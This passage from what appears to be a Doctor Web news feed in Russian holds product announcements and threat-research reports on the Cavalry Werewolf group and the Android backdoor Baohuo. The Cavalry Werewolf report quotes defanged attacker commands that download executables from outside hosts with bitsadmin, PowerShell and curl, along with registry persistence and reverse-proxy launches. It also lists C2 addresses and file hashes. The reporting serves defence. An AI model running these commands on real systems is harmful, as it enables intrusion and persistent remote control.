Предотвращение обнаружения	Зашифрованный / закодированный файл (T1027.013) Уклонение от отладки (T1622) Скрытое окно (T1564.003) Исключения для файла или пути (T1564.012) Деобфускация / декодирование файлов или данных (T1140) Перехват потока исполнения: перехват поиска DLL (T1574.001)
Организация управления	Двусторонняя связь (T1102.002) Веб-протоколы (T1071.001)

Индикаторы компрометации

Черная пятница: скидка 40% на комплексную защиту Dr.Web

Wed, 26 Nov 2025 03:41:16 GMT

С 26 ноября по 3 декабря 2025 года вы можете приобрести антивирусную защиту для компьютеров и мобильных устройств со скидкой 40%.

Сезон распродаж — время не только выгодных покупок, но и активности киберпреступников. В этот период растет число фишинговых атак, вредоносных приложений и попыток кражи платежных данных.
Решения Dr.Web помогут вам оставаться в безопасности!

Акция распространяется на:

Dr.Web Security Space — защита персональных компьютеров

блокирует вредоносные программы и шпионское ПО
защищает онлайн‑платежи и конфиденциальные данные
фильтрует фишинговые письма и предупреждает о мошеннических сайтах
не замедляет работу устройств

Dr.Web Security Space для мобильных устройств — защита мобильных устройств, планшетов, Smart TV и игровых консолей

непрерывно защищает от всех типов вредоносных программ
блокирует нежелательные звонки и СМС-спам
обеспечивает безопасность персональных данных, банковских операций и онлайн-покупок

Срок проведения акции: 26 ноября — 3 декабря 2025 года

Dr.Web CureIt! теперь видит то, что пытается скрыть вредоносное программное обеспечение

Thu, 20 Nov 2025 08:00:25 GMT

Компания «Доктор Веб» выпустила обновление для бесплатной утилиты Dr.Web CureIt!, наделив её уникальной функцией — возможностью проверять файлы и папки, внесённые вирусописателями в список исключений антивирусных программ. Это серьёзный шаг в борьбе со сложными угрозами, которые целенаправленно отключают системы защиты для беспрепятственной работы в системе.

Новая функция стала прямым следствием успешной работы другого продукта компании — Dr.Web FixIt!, применяемого специалистами компании для расследования инцидентов и лечения сложных заражений. Многие вредоносные программы, попав на компьютер, первым делом пытаются внести собственные исполняемые файлы в список исключений антивирусной защиты, что делает систему уязвимой: антивирусное ПО, будучи обманутым, игнорирует вредоносные объекты, позволяя злоумышленникам беспрепятственно красть данные, шифровать файлы или использовать ресурсы компьютера в бот-сетях.

Как работает новая функция:

При запуске проверки Dr.Web CureIt! теперь автоматически считывает и анализирует списки исключений установленного или встроенного антивируса.
Все файлы и папки, найденные в этих списках, подвергаются тщательной проверке с помощью антивирусного ядра Dr.Web.
Если в исключениях обнаруживается вредоносный объект, Dr.Web CureIt! уведомляет пользователя и удаляет угрозу.

Это нововведение критически важно для обычных пользователей, которые могут не подозревать, что их система защиты была скомпрометирована. Теперь, даже если вирус попытается спрятаться «на виду», Dr.Web CureIt! сможет его найти и обезвредить.

Планы на будущее: скорая экспертная помощь для Linux

Опираясь на успешный опыт применения сервиса Dr.Web FixIt! для Windows, «Доктор Веб» также готовится к выпуску полноценной версии сервиса для Linux, который нацелен на помощь ИБ-специалистам в расследовании кибератак на корпоративную инфраструктуру.
Сейчас вы можете использовать утилиту Dr.Web FixIt! для Linux для отправки информации о системе в нашу техническую поддержку.Утилита теперь расположена на новой странице - https://free.drweb.ru/sysinfo/
В дальнейшем, наработки, полученные в этой версии, позволят создать утилиту Dr.Web CureIt! и для обычных пользователей, которые смогут быстро проверить и вылечить свои ПК под управлением Linux от последствий заражения.

Скачать обновлённую версию Dr.Web CureIt! можно бесплатно* на официальном сайте: https://free.drweb.ru/download+cureit+free/

*Бесплатно только для персонального использования.

Выпущено обновление серверов централизованного управления Dr.Web Enterprise Security Suite и Dr.Web Industrial

Fri, 07 Nov 2025 10:00:00 GMT

Вышло обновление серверов Dr.Web Enterprise Security Suite и Dr.Web Industrial. Новая версия включает улучшения стабильности и новые инструменты централизованного управления действиями при обнаружении угроз на устройствах под управлением Android. Для получения всех преимуществ и корректной работы системы пользователям рекомендуется обновить серверы до актуальной версии.

В новой версии сервера Dr.Web Enterprise Security Suite реализованы изменения, направленные на повышение управляемости системы защиты. Также изменения произошли и в рамках продукта для защиты мобильных устройств под управлением ОС Android, что обеспечивает полноценный контроль антивирусной защиты со стороны Центра управления.

Данное обновление добавляет возможность централизованно управлять действиями компонентов Сканер и SpIDer Guard при обнаружении различных типов угроз на устройствах под управлением ОС Android. Теперь администратор может задать, как агент Dr.Web будет реагировать на угрозы — уведомлять, удалять или игнорировать их в зависимости от категории.

Настройки, ранее представленные как параметры «Проверять на наличие рекламных программ» и «Проверять на наличие потенциально опасных программ», заменены новым механизмом выбора действий. Если эти проверки были отключены, после обновления по умолчанию к соответствующим программам будет применяться действие «Игнорировать». В остальных случаях используется действие «Сообщать».

Важно для пользователей

Чтобы воспользоваться всеми возможностями новой версии и обеспечить корректную работу компонентов защиты, необходимо обновить серверы централизованного управления до актуальной версии.
Обновление доступно для загрузки через веб-интерфейс консоли управления.
При возникновении вопросов по настройке или планированию обновления администраторы антивирусных сетей могут обратиться за консультацией в Службу технической поддержки.

Обновленная версия Dr.Web для мобильных устройств с умной системой защиты

Fri, 07 Nov 2025 09:00:00 GMT

Вышел релиз антивирусных продуктов для защиты смартфонов, планшетов и других устройств на базе ОС Android. Основные улучшения касаются автоматизации защиты и стабильности работы.

Что делает этот релиз особенным

Новая функция автоматической обработки угроз, которая позволяет решениям Dr.Web удалять вредоносные объекты, блокировать подозрительные ссылки или изолировать потенциально опасные приложения без задержек и ручного вмешательства пользователя.

Что это значит для пользователей

Теперь у пользователей персональных устройств нет необходимости следить за всеми уведомлениями об угрозах, как раньше, потому что можно полностью исключить ручное реагирование. Это сделано для того, чтобы реакция антивирусного продукта не зависела от ответа пользователя на уведомления системы об обнаруженных угрозах и действиях с ними. Интеллектуальная система, разработанная специалистами «Доктор Веб», самостоятельно устраняет угрозы в режиме реального времени в соответствии с заданными параметрами реагирования на те или иные типы вредоносного ПО.
Особенно порадует это решение корпоративных пользователей. Автоматическое удаление вредоносных объектов, блокировка подозрительных ссылок и многие другие действия происходят мгновенно без непосредственного участия администраторов. Функция также поддерживается и со стороны Центра управления.

Администрирование стало еще удобнее

Важное уведомление!

Начиная с новой версии прекращается поддержка Android ОС версии 4.4. Просьба обратить на это внимание при обновлении.

Если вы используете версию Dr.Web Security Space для мобильных устройств, скачанную с официального сайта «Доктор Веб», для обновления необходимо полностью переустановить приложение — скачайте последнюю версию агента и установите ее.

Для пользователей Dr.Web Security Space для мобильных устройств, скачавших приложение из Google Play, использующих Dr.Web по подписке (Dr.Web Мобильный или Dr.Web Расширенный) или Dr.Web Mobile Security Suite, обновление пройдет в штатном режиме.

Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения

Thu, 06 Nov 2025 00:00:00 GMT

6 ноября 2025 года

Введение

В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.

В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.

В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.

Общие сведения об атаке и используемые инструменты

Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор BackDoor.ShellNET.1, который основан на ПО с открытым кодом Reverse-Shell-CS. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.

Варианты имен файлов BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

Пример фишингового письма с BackDoor.ShellNET.1. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива

Используя BackDoor.ShellNET.1, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

Первой из угроз, загруженных через BackDoor.ShellNET.1, была троянская программа-стилер Trojan.FileSpyNET.5. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).

Затем атакующие установили бэкдор BackDoor.Tunnel.41 (представляет собой ПО с открытым исходным кодом ReverseSocks5) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.

Инструменты Cavalry Werewolf

Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.

Точка входа

Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:

скрипты (BAT.DownLoader.1138);
исполняемые файлы (Trojan.Packed2.49708, Trojan.Siggen31.54011, BackDoor.Siggen2.5463, BackDoor.RShell.169, BackDoor.ReverseShell.10).

BAT.DownLoader.1138

Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор PowerShell.BackDoor.109. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.

Известные имена файлов BAT.DownLoader.1138	SHA1-хеш	С2-сервер
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

Устанавливает бэкдор BackDoor.Spy.4033, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Известные имена файлов Trojan.Packed2.49708	SHA1-хеш	С2-сервер
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

Устанавливает бэкдор BackDoor.Spy.4038, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.

Trojan.Siggen31.54011 функционально схож с вредоносной программой Trojan.Packed2.49708, но имеет несколько иной алгоритм извлечения полезной нагрузки.

SHA1-хеш	С2-сервер
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.

Известные имена файлов BackDoor.Siggen2.5463	SHA1-хеш	Полезная нагрузка
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.

Известные имена файлов BackDoor.RShell.169	SHA1-хеш	С2-сервер
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.

Известные имена файлов BackDoor.ReverseShell.10	SHA1-хеш	С2-сервер
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

Последующие ступени заражения

Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:

Trojan.Inject5.57968

Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения aspnet_compiler.exe из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.

Изучение активности Trojan.Inject5.57968 при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube

Известные имена файлов Trojan.Inject5.57968	SHA1-хеш	С2-сервер	Полезная нагрузка
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.

Известные имена файлов BackDoor.ShellNET.2	SHA1-хеш
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. BackDoor.ReverseProxy.1 запускается через командную строку cmd.exe с параметром -connect IP для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.

Выявлены следующие IP:

78[.]128.112[.]209 (указывался в параметре запуска)
96[.]9.125[.]168 (указывался в параметре запуска)
188[.]127.231[.]136 (зашит в коде)

Известные имена файлов BackDoor.ReverseProxy.1	SHA1-хеш
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.

В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Известные имена файлов Trojan.Packed2.49862	SHA1-хеш	С2-сервер	Полезная нагрузка
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram-бот	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram-бот	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram-бот	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

Характерные для группировки действия внутри скомпрометированной сети

После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.

Для получения информации о зараженном компьютере запускают команды:

whoami — получить сведения о текущем пользователе;
dir C:\\users\\<user>\\Downloads — получить список файлов в каталоге «Загрузки» текущего пользователя;
dir C:\\users\\public\\pictures\\ — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);
ipconfig /all — получить конфигурацию сети;
net user — получить список всех пользователей в системе.

Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

Для настройки параметров сети используют:

утилиту командной строки netsh, входящую в состав ОС Windows.

Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:

PowerShell (например: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
Bitsadmin (например: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
curl (например: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

Для закрепления в системе:

Могут модифицировать системный реестр Windows (например: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

Для запуска своих инструментов используют командный интерпретатор cmd.exe. Например:

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — для запуска BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — для запуска BackDoor.Tunnel.41.

Для удаления инструментов могут использовать PowerShell. Например:

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Злоумышленники также могут периодически проверять доступность С2-серверов через команду ping.

Особенности группировки Cavalry Werewolf

Можно выделить следующие особенности злоумышленников из группировки Cavalry Werewolf:

предпочитают использовать ПО с открытым кодом — как в исходном виде, так и в качестве основы для собственных разработок;
основными инструментами являются различные бэкдоры с функциональностью обратного шелла, позволяющие дистанционно выполнять команды в зараженных системах;
с целью сокрытия могут встраивать вредоносный код в изначально безобидные приложения;
часто применяют Telegram API для управления зараженными компьютерами;
для распространения первой ступени заражения проводят фишинговые рассылки якобы от имени государственных структур и используют для этого скомпрометированные email-адреса;
для загрузки последующих стадий заражения на целевое устройство используют директории C:\\users\\public\\pictures, C:\\users\\public\\libraries, C:\\users\\public\\downloads.

Подробные технические описания выявленных инструментов Cavalry Werewolf находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Матрица MITRE

Этап	Техника
Первоначальный доступ	Целевой фишинг с вложением (T1566.001)
Выполнение	Выполнение с участием пользователя (T1204) PowerShell (T1059.001) Командная оболочка Windows (T1059.003)
Закрепление	Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001) BITS-задачи (T1197)
Повышение привилегий	Обход контроля учетных записей (T1548.002)
Предотвращение обнаружения	BITS-задачи (T1197)
Организация управления	Внешний прокси-сервер (T1090.002) Двусторонняя связь (T1102.002)
Эксфильтрация данных	Эксфильтрация по каналу управления (T1041) Эксфильтрация через веб-службу (T1567)

Индикаторы компрометации

Решения Dr.Web поддерживают все версии ОС Windows, начиная с Windows XP

Thu, 30 Oct 2025 07:02:35 GMT

В связи с официальным объявлением компании Microsoft о завершении поддержки операционной системы Windows 10 с 14 октября 2025 года, компания «Доктор Веб» информирует своих пользователей и партнеров о следующем.

Поддержка продуктов Dr.Web на базе Windows 10
На текущий момент все версии решений Dr.Web полностью совместимы с операционной системой Windows 10. Мы подтверждаем, что:

Техническая поддержка, обновления антивирусных баз и программных компонентов Dr.Web продолжаются в штатном режиме;
После завершения поддержки со стороны Microsoft мы планируем и далее обеспечивать совместимость наших продуктов с Windows 10 — до тех пор, пока это возможно с учетом требований безопасности.

Долгосрочная поддержка всех версий, начиная с Windows XP
Несмотря на прекращение официальной поддержки многих версий ОС Windows, они по-прежнему активно используется в отдельных инфраструктурах — в том числе в промышленности, автоматизированных системах управления и специализированных корпоративных средах.
С учетом потребностей пользователей таких систем «Доктор Веб» продолжает обеспечивать поддержку всех версий ОС, начиная с Windows XP, в актуальных версиях решений Dr.Web для защиты рабочих станций.

! Обращаем ваше внимание, что использование устаревших версий ОС связано с определенными рисками.

Отсутствие обновлений безопасности оставляет уязвимости открытыми.
Несовместимость с современными версиями прикладного ПО (браузеры, драйверы и т.д.).
Повышенная вероятность компрометации — эксплойты для старых ОС широко доступны в открытых источниках, а атаки на уязвимые протоколы (SMBv1, TLS 1.0 и пр.) по-прежнему применяются злоумышленниками.

Даже если бизнес-процессы вашей компании критически зависят от данных систем, настоятельно рекомендуется запланировать миграцию на современные ОС, обеспечивающие обновления безопасности.
На период использования устаревших версий ОС необходимо изолировать узлы с данными ОС от интернета и основных корпоративных сегментов сети с помощью VLAN, DMZ или межсетевых экранов, а весь обмен данными с этими системами необходимо тщательно проверять на вредоносное содержание.

Серый кардинал Baohuo. Android-бэкдор захватывает учетные записи Telegram, получая над ними полный контроль

Thu, 23 Oct 2025 12:15:33 GMT

23 октября 2025 года

Компания «Доктор Веб» выявила опасный бэкдор Android.Backdoor.Baohuo.1.origin в модифицированных злоумышленниками версиях мессенджера Telegram X. Помимо возможности похищать конфиденциальные данные, включая логин и пароль пользователя, а также историю переписки, это ВПО обладает рядом уникальных особенностей. Например, чтобы предотвратить свое обнаружение и скрыть факт компрометации учетной записи, Android.Backdoor.Baohuo.1.origin умеет скрывать в списке активных сеансов Telegram подключения со сторонних устройств. Кроме того, он может добавлять и исключать пользователя из Telegram-каналов, вступать от его лица в чаты и выходить из них, также скрывая эти действия. Фактически с его помощью злоумышленники получают полный контроль над учетной записью жертвы и функциями мессенджера, а сам троян является инструментом для накрутки числа подписчиков в Telegram-каналах. Киберпреступники управляют бэкдором в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. По оценкам наших специалистов общее число устройств, зараженных Android.Backdoor.Baohuo.1.origin, превысило 58 000.

Распространение Android.Backdoor.Baohuo.1.origin началось в середине 2024 года, о чем свидетельствуют найденные при его анализе более ранние модификации. Основным способом доставки бэкдора на целевые устройства является реклама внутри мобильных приложений. Потенциальным жертвам демонстрируются объявления, в которых предлагается установить мессенджер Telegram X. При нажатии на баннер пользователи перенаправляются на вредоносные сайты, с которых и происходит загрузка троянского APK.

Эти сайты оформлены в стиле магазина приложений, а сам мессенджер позиционируется на них как площадка для удобного поиска партнера для общения и свиданий. Об этом говорят как баннеры с наложенным на них рекламным текстом о «бесплатных видеочатах» и с приглашениями «поговорить» (например, под видом скриншотов окна видеовызова), так и сочиненные злоумышленниками отзывы якобы довольных пользователей. Отметим, что на веб-страницах предусмотрена возможность выбора языка оформления, однако сами изображения при этом не меняются.

Один из вредоносных сайтов, с которых загружается троянская версия Telegram X. Потенциальным жертвам предлагается установить программу, где согласно «отзывам», легко найти партнера для общения и свиданий

В настоящее время киберпреступники подготовили типовые шаблоны с баннерами только для двух языков: португальского с ориентиром на пользователей из Бразилии, а также индонезийского. Таким образом, жители Бразилии и Индонезии являются главной целью для атакующих. В то же время нельзя исключать, что со временем интерес злоумышленников распространится и на пользователей из других стран.

Изучение сетевой инфраструктуры атакующих позволило определить масштаб их деятельности. В среднем вирусные аналитики «Доктор Веб» наблюдают порядка 20 000 активных подключений Android.Backdoor.Baohuo.1.origin. При этом общее число зараженных устройств превысило 58 000. Заражению подверглись около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.

Страны с наибольшим числом устройств, зараженных Android.Backdoor.Baohuo.1.origin (по данным антивирусной лаборатории «Доктор Веб»)

Однако Android.Backdoor.Baohuo.1.origin распространяется не только через вредоносные сайты: наши специалисты обнаружили его и в сторонних каталогах Android-приложений — например, APKPure, ApkSum и AndroidP. При этом в магазине APKPure он размещен от имени официального разработчика мессенджера, несмотря на то, что цифровые подписи оригинала и троянской модификации отличаются. Мы уведомили онлайн-площадки, в которых были найдены троянские версии Telegram X.

Модифицированный Telegram X с внедренным Android.Backdoor.Baohuo.1.origin распространялся в APKPure от имени настоящего разработчика мессенджера

Антивирусная лаборатория «Доктор Веб» выявила несколько разновидностей Android.Backdoor.Baohuo.1.origin, которые условно можно разделить на 3 основные группы модификаций Telegram X:

версии, в которых злоумышленники встроили бэкдор в основной исполняемый DEX-файл мессенджера;
версии, в которых бэкдор в виде патча динамически внедряется в исполняемый DEX-файл при помощи утилиты LSPatch;
версии, в которых бэкдор находится в отдельном DEX-файле в каталоге с ресурсами программы и загружается динамически.

Независимо от типа модификации Android.Backdoor.Baohuo.1.origin инициализируется при запуске самого мессенджера. Тот остается работоспособным и для пользователей выглядит как обычная программа. Однако в действительности злоумышленники через бэкдор полностью его контролируют и даже могут изменять логику его работы.

Когда киберпреступникам необходимо выполнить действие, которое не требует вмешательства в основную функциональность программы, используются заранее подготовленные «зеркала» необходимых методов приложения. Например, с их помощью могут отображаться фишинговые сообщения в окнах, которые внешне не будут отличаться от настоящих окон Telegram X.

Методы — это отдельные блоки кода в структуре Android-приложений, которые отвечают за выполнение тех или иных задач.

Если же действие не является стандартным для программы, то используется фреймворк Xposed, который непосредственно меняет ту или иную функциональность мессенджера через динамическую модификацию методов. В частности, с его помощью скрываются определенные чаты и авторизованные устройства, а также перехватывается содержимое буфера обмена.

Основное отличие ранних версий вредоносного приложения от актуальных — в организации управления трояном. В старых модификациях связь со злоумышленниками и получение от них заданий реализованы традиционным способом — через C2-сервер. Однако со временем вирусописатели добавили в Android.Backdoor.Baohuo.1.origin возможность отправки дополнительных команд через базу данных Redis, расширив тем самым его функциональность и обеспечив двумя независимыми каналами управления. При этом они предусмотрели дублирование новых команд и через обычный C2-сервер на случай, если база окажется недоступной. Это первый известный факт применения Redis для управления вредоносным ПО для Android.

Во время запуска Android.Backdoor.Baohuo.1.origin соединяется с начальным C2-сервером для загрузки конфигурации, которая среди прочего содержит данные для подключения к Redis. Через эту базу данных злоумышленники не только отправляют определенные команды вредоносному приложению, но и обновляют настройки трояна. В том числе они назначают адрес текущего C2-сервера, а также NPS-сервера. Последний вирусописатели используют для подключения зараженных устройств к своей внутренней сети (интранету) и превращения их в прокси для выхода в интернет.

Android.Backdoor.Baohuo.1.origin периодически связывается с C2-сервером через API-вызовы и может получать следующие задания:

загрузить на C2-сервер входящие СМС и контакты из телефонной книги зараженного устройства;
отправить на сервер содержимое буфера обмена при сворачивании мессенджера и возвращении в его окно;
получить от C2-сервера интернет-адреса для демонстрации рекламы, а также адрес сервера для скачивания обновления трояна в виде исполняемого DEX-файла;
получить ключи шифрования, которые используются при отправке некоторых данных на C2-сервер — например, содержимого буфера обмена;
запросить группу команд на сбор информации об установленных на устройстве приложениях, истории сообщений, контактах из телефонной книги устройства и об устройствах, на которых выполнен вход в Telegram (запрос выполняется с интервалом в 30 минут);
запросить у C2-сервера ссылку для скачивания обновления Telegram X;
запросить у C2-сервера конфигурацию, которая сохраняется в виде JSON-файла;
запросить информацию о базе данных Redis;
загрузить на C2-сервер информацию об устройстве при каждой сетевой активности мессенджера;
получить с C2-сервера список ботов, которые затем добавляются в список контактов Telegram;
каждые 3 минуты передавать на сервер информацию о текущих разрешениях приложения, состоянии устройства (включен ли или выключен экран, активно ли приложение), а также номер мобильного телефона с именем и паролем от учетной записи Telegram;
каждую минуту запрашивать команды в формате, аналогичном командам от базы данных Redis.

Для получения команд через Redis Android.Backdoor.Baohuo.1.origin подключается к соответствующему серверу злоумышленников, где регистрирует свой подканал — к нему в дальнейшем подключаются киберпреступники. Они публикуют в нем задания, которые бэкдор затем исполняет. Вредоносная программа может получать следующие команды:

создать черный список чатов, которые не будут отображаться пользователю в окне Telegram X;
скрыть от пользователя заданные устройства в списке авторизованных для его учетной записи;
заблокировать на заданное время отображение уведомлений от чатов из созданного черного списка;
